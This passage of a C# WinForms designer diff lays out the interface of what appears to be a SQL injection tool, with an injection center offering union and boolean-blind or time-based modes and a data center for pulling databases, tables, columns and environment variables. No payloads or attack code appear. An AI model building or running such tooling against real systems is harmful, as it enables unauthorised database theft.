this.cbox_file_readFileEncoding.SelectedValueChanged += new System.EventHandler(this.cbox_file_readFileEncoding_SelectedValueChanged); + // + // label24 + // + this.label24.AutoSize = true; + this.label24.Location = new System.Drawing.Point(253, 33); + this.label24.Name = "label24"; + this.label24.Size = new System.Drawing.Size(65, 12); + this.label24.TabIndex = 2; + this.label24.Text = "文件编码:"; + // + // tab_dataCenter + // + this.tab_dataCenter.Controls.Add(this.tabC_dataCenter); + this.tab_dataCenter.ImageKey = "db.png"; + this.tab_dataCenter.Location = new System.Drawing.Point(4, 23); + this.tab_dataCenter.Name = 
"tab_dataCenter"; + this.tab_dataCenter.Padding = new System.Windows.Forms.Padding(3); + this.tab_dataCenter.Size = new System.Drawing.Size(802, 424); + this.tab_dataCenter.TabIndex = 1; + this.tab_dataCenter.Text = "数据中心"; + this.tab_dataCenter.UseVisualStyleBackColor = true; + // + // tabC_dataCenter + // + this.tabC_dataCenter.Controls.Add(this.tab_vers); + this.tabC_dataCenter.Controls.Add(this.tab_dbs); + this.tabC_dataCenter.Dock = System.Windows.Forms.DockStyle.Fill; + this.tabC_dataCenter.ImageList = this.myicon_list; + this.tabC_dataCenter.Location = new System.Drawing.Point(3, 3); + this.tabC_dataCenter.Name = "tabC_dataCenter"; + this.tabC_dataCenter.SelectedIndex = 0; + this.tabC_dataCenter.Size = new System.Drawing.Size(796, 418); + this.tabC_dataCenter.TabIndex = 2; + // + // tab_vers + // + this.tab_vers.Controls.Add(this.data_lvw_ver); + this.tab_vers.Location = new System.Drawing.Point(4, 23); + this.tab_vers.Name = "tab_vers"; + this.tab_vers.Padding = new System.Windows.Forms.Padding(3); + this.tab_vers.Size = new System.Drawing.Size(788, 391); + this.tab_vers.TabIndex = 0; + this.tab_vers.Text = "环境变量"; + this.tab_vers.UseVisualStyleBackColor = true; + // + // data_lvw_ver + // + this.data_lvw_ver.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { + this.data_lvw_ver_verName, + this.data_lvw_ver_verValue}); + this.data_lvw_ver.ContextMenuStrip = this.data_cms_vers; + this.data_lvw_ver.Dock = System.Windows.Forms.DockStyle.Fill; + this.data_lvw_ver.FullRowSelect = true; + this.data_lvw_ver.Location = new System.Drawing.Point(3, 3); + this.data_lvw_ver.Name = "data_lvw_ver"; + this.data_lvw_ver.Size = new System.Drawing.Size(782, 385); + this.data_lvw_ver.TabIndex = 0; + this.data_lvw_ver.UseCompatibleStateImageBehavior = false; + this.data_lvw_ver.View = System.Windows.Forms.View.Details; + // + // data_lvw_ver_verName + // + this.data_lvw_ver_verName.Text = "变量名"; + this.data_lvw_ver_verName.Width = 200; + // + // data_lvw_ver_verValue + 
// + this.data_lvw_ver_verValue.Text = "变量值"; + this.data_lvw_ver_verValue.Width = 474; + // + // data_cms_vers + // + this.data_cms_vers.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.data_cms_tsmi_getVariable, + this.data_cms_tsmi_stopGetVariable, + this.data_cms_tsmi_copyVerValue}); + this.data_cms_vers.Name = "data_cms_getVariable"; + this.data_cms_vers.Size = new System.Drawing.Size(149, 70); + // + // data_cms_tsmi_getVariable + // + this.data_cms_tsmi_getVariable.Name = "data_cms_tsmi_getVariable"; + this.data_cms_tsmi_getVariable.Size = new System.Drawing.Size(148, 22); + this.data_cms_tsmi_getVariable.Text = "获取环境变量"; + this.data_cms_tsmi_getVariable.Click += new System.EventHandler(this.data_cms_tsmi_getVariable_Click); + // + // data_cms_tsmi_stopGetVariable + // + this.data_cms_tsmi_stopGetVariable.Name = "data_cms_tsmi_stopGetVariable"; + this.data_cms_tsmi_stopGetVariable.Size = new System.Drawing.Size(148, 22); + this.data_cms_tsmi_stopGetVariable.Text = "立即停止"; + this.data_cms_tsmi_stopGetVariable.Click += new System.EventHandler(this.data_cms_tsmi_stopGetVariable_Click); + // + // data_cms_tsmi_copyVerValue + // + this.data_cms_tsmi_copyVerValue.Name = "data_cms_tsmi_copyVerValue"; + this.data_cms_tsmi_copyVerValue.Size = new System.Drawing.Size(148, 22); + this.data_cms_tsmi_copyVerValue.Text = "复制变量值"; + this.data_cms_tsmi_copyVerValue.Click += new System.EventHandler(this.data_cms_tsmi_copyVerValue_Click); + // + // tab_dbs + // + this.tab_dbs.Controls.Add(this.spc_dbs); + this.tab_dbs.Location = new System.Drawing.Point(4, 23); + this.tab_dbs.Name = "tab_dbs"; + this.tab_dbs.Padding = new System.Windows.Forms.Padding(3); + this.tab_dbs.Size = new System.Drawing.Size(788, 391); + this.tab_dbs.TabIndex = 1; + this.tab_dbs.Text = "数据库信息"; + this.tab_dbs.UseVisualStyleBackColor = true; + // + // spc_dbs + // + this.spc_dbs.Dock = System.Windows.Forms.DockStyle.Fill; + this.spc_dbs.Location = new System.Drawing.Point(3, 3); + 
this.spc_dbs.Name = "spc_dbs"; + // + // spc_dbs.Panel1 + // + this.spc_dbs.Panel1.Controls.Add(this.data_dbs_ts); + this.spc_dbs.Panel1.Controls.Add(this.groupBox2); + // + // spc_dbs.Panel2 + // + this.spc_dbs.Panel2.Controls.Add(this.toolStrip1); + this.spc_dbs.Panel2.Controls.Add(this.groupBox4); + this.spc_dbs.Size = new System.Drawing.Size(782, 385); + this.spc_dbs.SplitterDistance = 225; + this.spc_dbs.TabIndex = 5; + // + // data_dbs_ts + // + this.data_dbs_ts.Dock = System.Windows.Forms.DockStyle.Bottom; + this.data_dbs_ts.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.data_dbs_tsl_getDBS, + this.data_dbs_tsl_getTables, + this.data_dbs_tsl_getColumns}); + this.data_dbs_ts.Location = new System.Drawing.Point(0, 360); + this.data_dbs_ts.Name = "data_dbs_ts"; + this.data_dbs_ts.Padding = new System.Windows.Forms.Padding(5, 0, 0, 0); + this.data_dbs_ts.RenderMode = System.Windows.Forms.ToolStripRenderMode.System; + this.data_dbs_ts.Size = new System.Drawing.Size(225, 25); + this.data_dbs_ts.TabIndex = 4; + this.data_dbs_ts.Text = "toolStrip1"; + // + // data_dbs_tsl_getDBS + // + this.data_dbs_tsl_getDBS.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text; + this.data_dbs_tsl_getDBS.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_getDBS.Image"))); + this.data_dbs_tsl_getDBS.ImageTransparentColor = System.Drawing.Color.Magenta; + this.data_dbs_tsl_getDBS.Name = "data_dbs_tsl_getDBS"; + this.data_dbs_tsl_getDBS.Size = new System.Drawing.Size(56, 22); + this.data_dbs_tsl_getDBS.Text = "获 取 库"; + this.data_dbs_tsl_getDBS.Click += new System.EventHandler(this.data_dbs_tsl_getDBS_Click); + // + // data_dbs_tsl_getTables + // + this.data_dbs_tsl_getTables.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text; + this.data_dbs_tsl_getTables.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_getTables.Image"))); + this.data_dbs_tsl_getTables.ImageTransparentColor = 
System.Drawing.Color.Magenta; + this.data_dbs_tsl_getTables.Name = "data_dbs_tsl_getTables"; + this.data_dbs_tsl_getTables.Size = new System.Drawing.Size(56, 22); + this.data_dbs_tsl_getTables.Text = "获 取 表"; + this.data_dbs_tsl_getTables.Click += new System.EventHandler(this.data_dbs_tsl_getTables_Click); + // + // data_dbs_tsl_getColumns + // + this.data_dbs_tsl_getColumns.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text; + this.data_dbs_tsl_getColumns.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_getColumns.Image"))); + this.data_dbs_tsl_getColumns.ImageTransparentColor = System.Drawing.Color.Magenta; + this.data_dbs_tsl_getColumns.Name = "data_dbs_tsl_getColumns"; + this.data_dbs_tsl_getColumns.Size = new System.Drawing.Size(56, 22); + this.data_dbs_tsl_getColumns.Text = "获 取 列"; + this.data_dbs_tsl_getColumns.Click += new System.EventHandler(this.data_dbs_tsl_getColumns_Click); + // + // groupBox2 + // + this.groupBox2.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.groupBox2.Controls.Add(this.data_tvw_dbs); + this.groupBox2.Location = new System.Drawing.Point(5, 5); + this.groupBox2.Name = "groupBox2"; + this.groupBox2.Size = new System.Drawing.Size(220, 352); + this.groupBox2.TabIndex = 0; + this.groupBox2.TabStop = false; + this.groupBox2.Text = "数据库信息"; + // + // data_tvw_dbs + // + this.data_tvw_dbs.BorderStyle = System.Windows.Forms.BorderStyle.None; + this.data_tvw_dbs.CheckBoxes = true; + this.data_tvw_dbs.ContextMenuStrip = this.data_cms_dbs; + this.data_tvw_dbs.Dock = System.Windows.Forms.DockStyle.Fill; + this.data_tvw_dbs.ImageIndex = 0; + this.data_tvw_dbs.ImageList = this.imglist_database; + this.data_tvw_dbs.LabelEdit = true; + this.data_tvw_dbs.Location = new System.Drawing.Point(3, 17); + this.data_tvw_dbs.Name = 
"data_tvw_dbs"; + this.data_tvw_dbs.SelectedImageIndex = 6; + this.data_tvw_dbs.Size = new System.Drawing.Size(214, 332); + this.data_tvw_dbs.TabIndex = 0; + this.data_tvw_dbs.AfterCheck += new System.Windows.Forms.TreeViewEventHandler(this.data_tvw_dbs_AfterCheck); + this.data_tvw_dbs.AfterSelect += new System.Windows.Forms.TreeViewEventHandler(this.data_tvw_dbs_AfterSelect); + // + // data_cms_dbs + // + this.data_cms_dbs.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.data_dbs_tsmi_addDBS, + this.data_dbs_tsmi_addTableOrColumn, + this.data_dbs_tsmi_getTableNames, + this.data_dbs_tsmi_deleteNode, + this.data_dbs_tsmi_stopGetInfos, + this.data_dbs_tsmi_saveDTCStruct, + this.data_dbs_tsmi_loadDTCStruct, + this.data_dbs_tsmi_clearDTCStruct}); + this.data_cms_dbs.Name = "data_cms_getVariable"; + this.data_cms_dbs.Size = new System.Drawing.Size(161, 180); + // + // data_dbs_tsmi_addDBS + // + this.data_dbs_tsmi_addDBS.Name = "data_dbs_tsmi_addDBS"; + this.data_dbs_tsmi_addDBS.Size = new System.Drawing.Size(160, 22); + this.data_dbs_tsmi_addDBS.Text = "添加数据库"; + this.data_dbs_tsmi_addDBS.Click += new System.EventHandler(this.data_dbs_tsmi_addDBS_Click); + // + // data_dbs_tsmi_addTableOrColumn + // + this.data_dbs_tsmi_addTableOrColumn.Name = "data_dbs_tsmi_addTableOrColumn"; + this.data_dbs_tsmi_addTableOrColumn.Size = new System.Drawing.Size(160, 22); + this.data_dbs_tsmi_addTableOrColumn.Text = "添加表或列"; + this.data_dbs_tsmi_addTableOrColumn.Click += new System.EventHandler(this.data_dbs_tsmi_addTableOrColumn_Click); + // + // data_dbs_tsmi_getTableNames + // + this.data_dbs_tsmi_getTableNames.Name = "data_dbs_tsmi_getTableNames"; + this.data_dbs_tsmi_getTableNames.Size = new System.Drawing.Size(160, 22); + this.data_dbs_tsmi_getTableNames.Text = "修改节点"; + this.data_dbs_tsmi_getTableNames.Click += new System.EventHandler(this.data_dbs_tsmi_getTableNames_Click); + // + // data_dbs_tsmi_deleteNode + // + this.data_dbs_tsmi_deleteNode.Name = 
"data_dbs_tsmi_deleteNode"; + this.data_dbs_tsmi_deleteNode.Size = new System.Drawing.Size(160, 22); + this.data_dbs_tsmi_deleteNode.Text = "删除节点"; + this.data_dbs_tsmi_deleteNode.Click += new System.EventHandler(this.data_dbs_tsmi_deleteNode_Click); + // + // data_dbs_tsmi_stopGetInfos + // + this.data_dbs_tsmi_stopGetInfos.Name = "data_dbs_tsmi_stopGetInfos"; + this.data_dbs_tsmi_stopGetInfos.Size = new System.Drawing.Size(160, 22); + this.data_dbs_tsmi_stopGetInfos.Text = "立即停止"; + this.data_dbs_tsmi_stopGetInfos.Click += new System.EventHandler(this.data_dbs_tsmi_stopGetInfos_Click); + // + // data_dbs_tsmi_saveDTCStruct + // + this.data_dbs_tsmi_saveDTCStruct.Name = "data_dbs_tsmi_saveDTCStruct"; + this.data_dbs_tsmi_saveDTCStruct.Size = new System.Drawing.Size(160, 22); + this.data_dbs_tsmi_saveDTCStruct.Text = "保存库表列结构"; + this.data_dbs_tsmi_saveDTCStruct.Click += new System.EventHandler(this.data_dbs_tsmi_saveDTCStruct_Click); + // + // data_dbs_tsmi_loadDTCStruct + // + this.data_dbs_tsmi_loadDTCStruct.Name = "data_dbs_tsmi_loadDTCStruct"; + this.data_dbs_tsmi_loadDTCStruct.Size = new System.Drawing.Size(160, 22); + this.data_dbs_tsmi_loadDTCStruct.Text = "加载库表列结构"; + this.data_dbs_tsmi_loadDTCStruct.Click += new System.EventHandler(this.data_dbs_tsmi_loadDTCStruct_Click); + // + // data_dbs_tsmi_clearDTCStruct + // + this.data_dbs_tsmi_clearDTCStruct.Name = "data_dbs_tsmi_clearDTCStruct"; + this.data_dbs_tsmi_clearDTCStruct.Size = new System.Drawing.Size(160, 22); + this.data_dbs_tsmi_clearDTCStruct.Text = "清空所有结构"; + this.data_dbs_tsmi_clearDTCStruct.Click += new System.EventHandler(this.data_dbs_tsmi_clearDTCStruct_Click); + // + // imglist_database + // + this.imglist_database.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imglist_database.ImageStream"))); + this.imglist_database.TransparentColor = System.Drawing.Color.Transparent; + this.imglist_database.Images.SetKeyName(0, "db.png"); + 
this.imglist_database.Images.SetKeyName(1, "table2.png"); + this.imglist_database.Images.SetKeyName(2, "column2.png"); + this.imglist_database.Images.SetKeyName(3, "column.png"); + this.imglist_database.Images.SetKeyName(4, "column1.png"); + this.imglist_database.Images.SetKeyName(5, "table1.png"); + this.imglist_database.Images.SetKeyName(6, "Image_1.png"); + // + // toolStrip1 + // + this.toolStrip1.Dock = System.Windows.Forms.DockStyle.Bottom; + this.toolStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.toolStripLabel3, + this.data_dbs_txt_start, + this.toolStripLabel1, + this.data_dbs_txt_count, + this.data_dbs_tsl_getDatas, + this.data_dbs_tsl_exportDatas, + this.toolStripLabel2, + this.data_dbs_cob_db_encoding}); + this.toolStrip1.Location = new System.Drawing.Point(0, 360); + this.toolStrip1.Name = "toolStrip1"; + this.toolStrip1.RenderMode = System.Windows.Forms.ToolStripRenderMode.System; + this.toolStrip1.Size = new System.Drawing.Size(553, 25); + this.toolStrip1.TabIndex = 5; + this.toolStrip1.Text = "toolStrip1"; + this.toolStrip1.TextChanged += new System.EventHandler(this.toolStrip1_TextChanged); + // + // toolStripLabel3 + // + this.toolStripLabel3.Name = "toolStripLabel3"; + this.toolStripLabel3.Size = new System.Drawing.Size(48, 22); + this.toolStripLabel3.Text = "开 始:"; + // + // data_dbs_txt_start + // + this.data_dbs_txt_start.Margin = new System.Windows.Forms.Padding(0); + this.data_dbs_txt_start.MaxLength = 9; + this.data_dbs_txt_start.Name = "data_dbs_txt_start"; + this.data_dbs_txt_start.Size = new System.Drawing.Size(50, 25); + this.data_dbs_txt_start.Text = "0"; + // + // toolStripLabel1 + // + this.toolStripLabel1.Name = "toolStripLabel1"; + this.toolStripLabel1.Size = new System.Drawing.Size(48, 22); + this.toolStripLabel1.Text = "条 数:"; + // + // data_dbs_txt_count + // + this.data_dbs_txt_count.MaxLength = 9; + this.data_dbs_txt_count.Name = "data_dbs_txt_count"; + this.data_dbs_txt_count.Size = new 
System.Drawing.Size(50, 25); + this.data_dbs_txt_count.Text = "1"; + // + // data_dbs_tsl_getDatas + // + this.data_dbs_tsl_getDatas.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text; + this.data_dbs_tsl_getDatas.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_getDatas.Image"))); + this.data_dbs_tsl_getDatas.ImageTransparentColor = System.Drawing.Color.Magenta; + this.data_dbs_tsl_getDatas.Name = "data_dbs_tsl_getDatas"; + this.data_dbs_tsl_getDatas.Size = new System.Drawing.Size(60, 22); + this.data_dbs_tsl_getDatas.Text = "获取数据"; + this.data_dbs_tsl_getDatas.Click += new System.EventHandler(this.data_dbs_tsl_getDatas_Click); + // + // data_dbs_tsl_exportDatas + // + this.data_dbs_tsl_exportDatas.DisplayStyle = System.Windows.Forms.ToolStripItemDisplayStyle.Text; + this.data_dbs_tsl_exportDatas.Image = ((System.Drawing.Image)(resources.GetObject("data_dbs_tsl_exportDatas.Image"))); + this.data_dbs_tsl_exportDatas.ImageTransparentColor = System.Drawing.Color.Magenta; + this.data_dbs_tsl_exportDatas.Name = "data_dbs_tsl_exportDatas"; + this.data_dbs_tsl_exportDatas.Size = new System.Drawing.Size(60, 22); + this.data_dbs_tsl_exportDatas.Text = "导出数据"; + this.data_dbs_tsl_exportDatas.Click += new System.EventHandler(this.data_dbs_tsl_exportDatas_Click); + // + // toolStripLabel2 + // + this.toolStripLabel2.Name = "toolStripLabel2"; + this.toolStripLabel2.Size = new System.Drawing.Size(44, 22); + this.toolStripLabel2.Text = "编码:"; + // + // data_dbs_cob_db_encoding + // + this.data_dbs_cob_db_encoding.Items.AddRange(new object[] { + "UTF-8", + "GB2312", + "GBK", + "ISO-8859-1", + "EUC-KR"}); + this.data_dbs_cob_db_encoding.Name = "data_dbs_cob_db_encoding"; + this.data_dbs_cob_db_encoding.Size = new System.Drawing.Size(75, 25); + this.data_dbs_cob_db_encoding.TextChanged += new System.EventHandler(this.data_dbs_cob_db_encoding_TextChanged); + // + // groupBox4 + // + this.groupBox4.Anchor = 
((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.groupBox4.Controls.Add(this.data_dbs_lvw_data); + this.groupBox4.Location = new System.Drawing.Point(3, 5); + this.groupBox4.Name = "groupBox4"; + this.groupBox4.Size = new System.Drawing.Size(547, 352); + this.groupBox4.TabIndex = 1; + this.groupBox4.TabStop = false; + this.groupBox4.Text = "获取数据"; + // + // data_dbs_lvw_data + // + this.data_dbs_lvw_data.BorderStyle = System.Windows.Forms.BorderStyle.None; + this.data_dbs_lvw_data.ContextMenuStrip = this.cms_data_dbs_lvw_data; + this.data_dbs_lvw_data.Dock = System.Windows.Forms.DockStyle.Fill; + this.data_dbs_lvw_data.FullRowSelect = true; + this.data_dbs_lvw_data.GridLines = true; + this.data_dbs_lvw_data.Location = new System.Drawing.Point(3, 17); + this.data_dbs_lvw_data.Name = "data_dbs_lvw_data"; + this.data_dbs_lvw_data.Size = new System.Drawing.Size(541, 332); + this.data_dbs_lvw_data.TabIndex = 1; + this.data_dbs_lvw_data.UseCompatibleStateImageBehavior = false; + this.data_dbs_lvw_data.View = System.Windows.Forms.View.Details; + this.data_dbs_lvw_data.ColumnClick += new System.Windows.Forms.ColumnClickEventHandler(this.data_dbs_lvw_data_ColumnClick); + // + // cms_data_dbs_lvw_data + // + this.cms_data_dbs_lvw_data.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.data_dbs_lvw_tsmi_copyLineData, + this.data_dbs_lvw_tsmi_stop, + this.tsmi_clearColumns}); + this.cms_data_dbs_lvw_data.Name = "data_cms_getVariable"; + this.cms_data_dbs_lvw_data.Size = new System.Drawing.Size(149, 70); + // + // data_dbs_lvw_tsmi_copyLineData + // + this.data_dbs_lvw_tsmi_copyLineData.Name = "data_dbs_lvw_tsmi_copyLineData"; + this.data_dbs_lvw_tsmi_copyLineData.Size = new System.Drawing.Size(148, 22); + this.data_dbs_lvw_tsmi_copyLineData.Text = "复制此行数据"; + 
this.data_dbs_lvw_tsmi_copyLineData.Click += new System.EventHandler(this.data_dbs_lvw_tsmi_copyLineData_Click); + // + // data_dbs_lvw_tsmi_stop + // + this.data_dbs_lvw_tsmi_stop.Name = "data_dbs_lvw_tsmi_stop"; + this.data_dbs_lvw_tsmi_stop.Size = new System.Drawing.Size(148, 22); + this.data_dbs_lvw_tsmi_stop.Text = "立即停止"; + this.data_dbs_lvw_tsmi_stop.Click += new System.EventHandler(this.data_dbs_lvw_tsmi_stop_Click); + // + // tsmi_clearColumns + // + this.tsmi_clearColumns.Name = "tsmi_clearColumns"; + this.tsmi_clearColumns.Size = new System.Drawing.Size(148, 22); + this.tsmi_clearColumns.Text = "清 空"; + this.tsmi_clearColumns.Click += new System.EventHandler(this.tsmi_clearColumns_Click); + // + // myicon_list + // + this.myicon_list.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("myicon_list.ImageStream"))); + this.myicon_list.TransparentColor = System.Drawing.Color.Transparent; + this.myicon_list.Images.SetKeyName(0, "Image_1.png"); + this.myicon_list.Images.SetKeyName(1, "cmd.png"); + this.myicon_list.Images.SetKeyName(2, "codeChange.png"); + this.myicon_list.Images.SetKeyName(3, "config.png"); + this.myicon_list.Images.SetKeyName(4, "convert.png"); + this.myicon_list.Images.SetKeyName(5, "db.png"); + this.myicon_list.Images.SetKeyName(6, "editFile.png"); + this.myicon_list.Images.SetKeyName(7, "log.png"); + this.myicon_list.Images.SetKeyName(8, "tools.png"); + this.myicon_list.Images.SetKeyName(9, "scan.png"); + // + // tab_injectCenter + // + this.tab_injectCenter.Controls.Add(this.groupBox1); + this.tab_injectCenter.ImageKey = "config.png"; + this.tab_injectCenter.Location = new System.Drawing.Point(4, 23); + this.tab_injectCenter.Name = "tab_injectCenter"; + this.tab_injectCenter.Padding = new System.Windows.Forms.Padding(3); + this.tab_injectCenter.Size = new System.Drawing.Size(802, 424); + this.tab_injectCenter.TabIndex = 0; + this.tab_injectCenter.Text = "注入中心"; + this.tab_injectCenter.UseVisualStyleBackColor = 
true; + // + // groupBox1 + // + this.groupBox1.Controls.Add(this.txt_inject_request); + this.groupBox1.Controls.Add(this.groupBox3); + this.groupBox1.Dock = System.Windows.Forms.DockStyle.Fill; + this.groupBox1.Location = new System.Drawing.Point(3, 3); + this.groupBox1.Name = "groupBox1"; + this.groupBox1.Size = new System.Drawing.Size(796, 418); + this.groupBox1.TabIndex = 1; + this.groupBox1.TabStop = false; + this.groupBox1.Text = "数据包"; + // + // txt_inject_request + // + this.txt_inject_request.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.txt_inject_request.ContextMenuStrip = this.cms_dataPacks; + this.txt_inject_request.Location = new System.Drawing.Point(15, 20); + this.txt_inject_request.MaxLength = 1024000; + this.txt_inject_request.Multiline = true; + this.txt_inject_request.Name = "txt_inject_request"; + this.txt_inject_request.ScrollBars = System.Windows.Forms.ScrollBars.Vertical; + this.txt_inject_request.Size = new System.Drawing.Size(548, 392); + this.txt_inject_request.TabIndex = 13; + this.txt_inject_request.Text = resources.GetString("txt_inject_request.Text"); + this.txt_inject_request.TextChanged += new System.EventHandler(this.txt_inject_request_TextChanged); + this.txt_inject_request.KeyDown += new System.Windows.Forms.KeyEventHandler(this.txt_inject_request_KeyDown); + // + // cms_dataPacks + // + this.cms_dataPacks.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.tsmi_createGetTemplate, + this.tsmi_createPOSTTemplate, + this.tsmi_changeRequestMethod, + this.tsmi_createPackByURL}); + this.cms_dataPacks.Name = "cms_dataPacks"; + this.cms_dataPacks.Size = new System.Drawing.Size(184, 92); + this.cms_dataPacks.Text = "复制数据"; + // + // tsmi_createGetTemplate + // + this.tsmi_createGetTemplate.Name = "tsmi_createGetTemplate"; + 
this.tsmi_createGetTemplate.Size = new System.Drawing.Size(183, 22); + this.tsmi_createGetTemplate.Text = "生成GET模板"; + this.tsmi_createGetTemplate.Click += new System.EventHandler(this.tsmi_createGetTemplate_Click); + // + // tsmi_createPOSTTemplate + // + this.tsmi_createPOSTTemplate.Name = "tsmi_createPOSTTemplate"; + this.tsmi_createPOSTTemplate.Size = new System.Drawing.Size(183, 22); + this.tsmi_createPOSTTemplate.Text = "生成POST模板"; + this.tsmi_createPOSTTemplate.Click += new System.EventHandler(this.tsmi_createPOSTTemplate_Click); + // + // tsmi_changeRequestMethod + // + this.tsmi_changeRequestMethod.Name = "tsmi_changeRequestMethod"; + this.tsmi_changeRequestMethod.Size = new System.Drawing.Size(183, 22); + this.tsmi_changeRequestMethod.Text = "转换提交方式"; + this.tsmi_changeRequestMethod.Click += new System.EventHandler(this.tsmi_changeRequestMethod_Click); + // + // tsmi_createPackByURL + // + this.tsmi_createPackByURL.Name = "tsmi_createPackByURL"; + this.tsmi_createPackByURL.Size = new System.Drawing.Size(183, 22); + this.tsmi_createPackByURL.Text = "根据URL生成数据包"; + this.tsmi_createPackByURL.Click += new System.EventHandler(this.tsmi_createPackByURL_Click); + // + // groupBox3 + // + this.groupBox3.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Right))); + this.groupBox3.Controls.Add(this.groupBox16); + this.groupBox3.Controls.Add(this.groupBox15); + this.groupBox3.Controls.Add(this.chk_openURLEncoding); + this.groupBox3.Controls.Add(this.btn_inject_setEncodingRange); + this.groupBox3.Controls.Add(this.label13); + this.groupBox3.Controls.Add(this.label12); + this.groupBox3.Controls.Add(this.btn_inject_clearRequest); + this.groupBox3.Controls.Add(this.btn_inject_sendData); + this.groupBox3.Controls.Add(this.chk_inject_foward_302); + this.groupBox3.Controls.Add(this.btn_inject_setInject); + this.groupBox3.Location = new 
System.Drawing.Point(569, 13); + this.groupBox3.Name = "groupBox3"; + this.groupBox3.Size = new System.Drawing.Size(225, 399); + this.groupBox3.TabIndex = 12; + this.groupBox3.TabStop = false; + this.groupBox3.Text = "注入设置"; + // + // groupBox16 + // + this.groupBox16.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.groupBox16.Controls.Add(this.label4); + this.groupBox16.Controls.Add(this.txt_inject_showColumn); + this.groupBox16.Controls.Add(this.label8); + this.groupBox16.Controls.Add(this.txt_inject_unionColumnsCount); + this.groupBox16.Location = new System.Drawing.Point(0, 127); + this.groupBox16.Name = "groupBox16"; + this.groupBox16.Size = new System.Drawing.Size(225, 92); + this.groupBox16.TabIndex = 14; + this.groupBox16.TabStop = false; + this.groupBox16.Text = "Union注入取数据配置"; + // + // label4 + // + this.label4.AutoSize = true; + this.label4.Location = new System.Drawing.Point(15, 26); + this.label4.Name = "label4"; + this.label4.Size = new System.Drawing.Size(65, 12); + this.label4.TabIndex = 1; + this.label4.Text = "数据列数:"; + // + // txt_inject_showColumn + // + this.txt_inject_showColumn.Location = new System.Drawing.Point(86, 59); + this.txt_inject_showColumn.MaxLength = 3; + this.txt_inject_showColumn.Name = "txt_inject_showColumn"; + this.txt_inject_showColumn.Size = new System.Drawing.Size(120, 21); + this.txt_inject_showColumn.TabIndex = 9; + this.txt_inject_showColumn.Text = "2"; + this.txt_inject_showColumn.TextChanged += new System.EventHandler(this.txt_inject_showColumn_TextChanged); + // + // label8 + // + this.label8.AutoSize = true; + this.label8.Location = new System.Drawing.Point(15, 62); + this.label8.Name = "label8"; + this.label8.Size = new System.Drawing.Size(65, 12); + this.label8.TabIndex = 8; + this.label8.Text = "显 示 列:"; + // + // txt_inject_unionColumnsCount + // + 
this.txt_inject_unionColumnsCount.Location = new System.Drawing.Point(86, 23); + this.txt_inject_unionColumnsCount.MaxLength = 3; + this.txt_inject_unionColumnsCount.Name = "txt_inject_unionColumnsCount"; + this.txt_inject_unionColumnsCount.Size = new System.Drawing.Size(120, 21); + this.txt_inject_unionColumnsCount.TabIndex = 7; + this.txt_inject_unionColumnsCount.Text = "3"; + this.txt_inject_unionColumnsCount.TextChanged += new System.EventHandler(this.txt_inject_unionColumnsCount_TextChanged); + // + // groupBox15 + // + this.groupBox15.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) + | System.Windows.Forms.AnchorStyles.Left) + | System.Windows.Forms.AnchorStyles.Right))); + this.groupBox15.Controls.Add(this.cbox_inject_type); + this.groupBox15.Controls.Add(this.label27); + this.groupBox15.Controls.Add(this.inject_btn_autoFindKey); + this.groupBox15.Controls.Add(this.injectConfig_btn_checkKey); + this.groupBox15.Controls.Add(this.txt_inject_key); + this.groupBox15.Controls.Add(this.chk_inject_reverseKey); + this.groupBox15.Location = new System.Drawing.Point(0, 233); + this.groupBox15.Name = "groupBox15"; + this.groupBox15.Size = new System.Drawing.Size(227, 166); + this.groupBox15.TabIndex = 14; + this.groupBox15.TabStop = false; + this.groupBox15.Text = "Bool盲注取数据配置"; + // + // cbox_inject_type + // + this.cbox_inject_type.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; + this.cbox_inject_type.FormattingEnabled = true; + this.cbox_inject_type.Items.AddRange(new object[] { + "关键字判断-Bool", + "状态码判断-Bool", + "响应长度判断-Bool", + "时间判断-延时"}); + this.cbox_inject_type.Location = new System.Drawing.Point(83, 25); + this.cbox_inject_type.Name = "cbox_inject_type"; + this.cbox_inject_type.Size = new System.Drawing.Size(123, 20); + this.cbox_inject_type.TabIndex = 27; + this.cbox_inject_type.SelectedIndexChanged += new 
